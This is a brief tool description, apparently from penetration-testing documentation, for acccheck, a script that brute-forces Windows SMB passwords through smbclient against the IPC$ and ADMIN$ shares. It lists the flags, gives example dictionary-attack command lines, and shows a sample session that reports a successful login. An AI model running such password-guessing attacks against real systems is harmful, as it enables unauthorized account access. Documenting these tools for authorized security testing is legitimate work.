Acccheck Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been chosen, and tries a combination of usernames and passwords in the hope to identify the password to a given account via a dictionary password guessing attack. this tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution. only use -v mode on very small dictionaries, otherwise, this has the affect of slowing the scan down to the rate the system writes to standard out.
acc check [optional]
-t [single host IP address] OR -T [file containing target ip address(es)] Optional: -p [single password] -P [file containing passwords] -u [single user] -U [file containing usernames] -v [verbose mode] Examples Attempt the 'Administrator' account with a [BLANK] password. acccheck.pl -t 10.10.10.1 Attempt all passwords in 'password.txt' against the 'Administrator' account. acccheck.pl -t 10.10.10.1 -P password.txt Attempt all password in 'password.txt' against all users in 'users.txt'. acccehck.pl -t 10.10.10.1 -U users.txt -P password.txt Attempt a single password against a single user. acccheck.pl -t 10.10.10.1 -u administrator -p password
cyborg@cyborg:~$ sudo acccheck -t 192.168.7.251 -u cyborgmod-p ndijd5381fsd%&*#*( SUCCESS.... connected to 192.168.7.251 with username:'cyborgmod' and password:'ndijd5381fsd%&*#*(' End of Scan